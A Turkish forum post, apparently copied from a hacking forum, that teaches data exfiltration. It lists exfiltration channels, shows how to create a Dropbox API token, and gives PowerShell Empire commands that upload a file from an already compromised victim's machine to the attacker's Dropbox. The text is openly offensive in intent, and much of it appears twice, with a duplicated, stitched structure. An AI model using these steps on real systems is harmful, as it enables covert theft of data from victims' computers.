- 25 Nis 2020
- 19
- 0
Veri Sızdırma Nedir?
Veri sızdırma, kötü amaçlı bir yazılım ve\veya kötü amaçlı bir aktör, bir bilgisayardan yetkisiz veri aktarımı gerçekleştirince oluşur.Buna ayrıca veri ekstrüzyonu veya veri ihracatı da denir.Veri ekstrüzyonu da bir veri hırsızlığıdır. Son yıllarda veri sızdırma çabaları, işletmecilerin tüketici güvenine, kurumsal değerlemesine, fikri mülkiyetine, dünya çapında da hükümetlerin ulusal güvenliğine zarar verdi.
Veri Sızdırma Yöntemleri
Dropbox API Üzerinden Token Oluşturmak
Bunu yapmak için, bu tool bir Dropbox API gerektiriyor. Bunun için önce bir Dropbox hesabı oluşturun. Hesabı oluşturduktan sonra geliştirici tool'larına gidin. Aşağıdakine benzer bir web sayfası açılacaktır. Dropbox API'ı seçeceğiz. Daha sonra, erişim türü bölümünde "Uygulama Klasörü"'nü seçeceğiz. Uygulamayı her seçimde adlandırın. Devam etmek için "Uygulama Oluşturma Butonu"'na tıklayın
Bu sizi aşağıdakine benzer başka bir siteye yönlendirecektir. O Auth 2 bölümüne gidin ve erişim için bir token oluşturun. Oluşturulan erişim token'i, bu belirli pratik için gerekli olan Dropbpx API'ını verecek. Şimdi o oluşturulan token'i kopyalayın.
Veri Sızdırma
PowerShell Empire'ı veri sızdırmak için kullanacağız, ki zaten hedef, makinesini tehlikeye attığımızın ve içerden veri kopyaladığımızın farkına varmadan görevimizi tamamlamak üzereyiz. Görebileceğiniz gibi Empire-agent'a sahibiz. Bu demektir ki zaten kurbanın makinesinin shell'ini oluşturmuşum ve yukarıdaki token'i veri sızdırması için Empire'ın post exploit'inde kullanabiliriz.
/my files'ın içinde notes.txt'nin olduğunu görebilirsiniz, bu da verileri bir kaynak konumdan hedefe başarıyla aktardığımız anlamına geliyor.
Böylece, bu şekilde, kurbanın makinesinden verileri Dropbox'ımıza başarıyla aktardık ve dolayısıyla bu teknik Dropbox Sızdırması olarak bilinir.
Veri sızdırma, kötü amaçlı bir yazılım ve\veya kötü amaçlı bir aktör, bir bilgisayardan yetkisiz veri aktarımı gerçekleştirince oluşur.Buna ayrıca veri ekstrüzyonu veya veri ihracatı da denir.Veri ekstrüzyonu da bir veri hırsızlığıdır. Son yıllarda veri sızdırma çabaları, işletmecilerin tüketici güvenine, kurumsal değerlemesine, fikri mülkiyetine, dünya çapında da hükümetlerin ulusal güvenliğine zarar verdi.
Veri Sızdırma Yöntemleri
Açık Yöntemler:
Gizli Yöntemler:
(Wikipedia'dan)
- HTTP/HTTPS Download ve Upload'ları
- FTP
- Anlık Mesajlaşma
- P2P Dosya Paylaşımı
Gizli Yöntemler:
- SSH
- VPN
- Protocol Tunneling
- Bulut Depolama Upload'ları
- Steganografi
- Timing channel
(Wikipedia'dan)
Dropbox API Üzerinden Token Oluşturmak
Bunu yapmak için, bu tool bir Dropbox API gerektiriyor. Bunun için önce bir Dropbox hesabı oluşturun. Hesabı oluşturduktan sonra geliştirici tool'larına gidin. Aşağıdakine benzer bir web sayfası açılacaktır. Dropbox API'ı seçeceğiz. Daha sonra, erişim türü bölümünde "Uygulama Klasörü"'nü seçeceğiz. Uygulamayı her seçimde adlandırın. Devam etmek için "Uygulama Oluşturma Butonu"'na tıklayın
Bu sizi aşağıdakine benzer başka bir siteye yönlendirecektir. O Auth 2 bölümüne gidin ve erişim için bir token oluşturun. Oluşturulan erişim token'i, bu belirli pratik için gerekli olan Dropbpx API'ını verecek. Şimdi o oluşturulan token'i kopyalayın.
Veri Sızdırma
PowerShell Empire'ı veri sızdırmak için kullanacağız, ki zaten hedef, makinesini tehlikeye attığımızın ve içerden veri kopyaladığımızın farkına varmadan görevimizi tamamlamak üzereyiz. Görebileceğiniz gibi Empire-agent'a sahibiz. Bu demektir ki zaten kurbanın makinesinin shell'ini oluşturmuşum ve yukarıdaki token'i veri sızdırması için Empire'ın post exploit'inde kullanabiliriz.
Kod:
usemodule exfiltration/exfil_dropbox
set SourceFilePath C:\Users\raj\Desktop\notes.txt
set TargetFilePath /Apps/notes.txt
set ApiKey <API Token>
execute
/my files'ın içinde notes.txt'nin olduğunu görebilirsiniz, bu da verileri bir kaynak konumdan hedefe başarıyla aktardığımız anlamına geliyor.
Böylece, bu şekilde, kurbanın makinesinden verileri Dropbox'ımıza başarıyla aktardık ve dolayısıyla bu teknik Dropbox Sızdırması olarak bilinir.
kaynak:https://www.turkhackteam.org/intern...ata-exfiltration-using-powershell-empire.html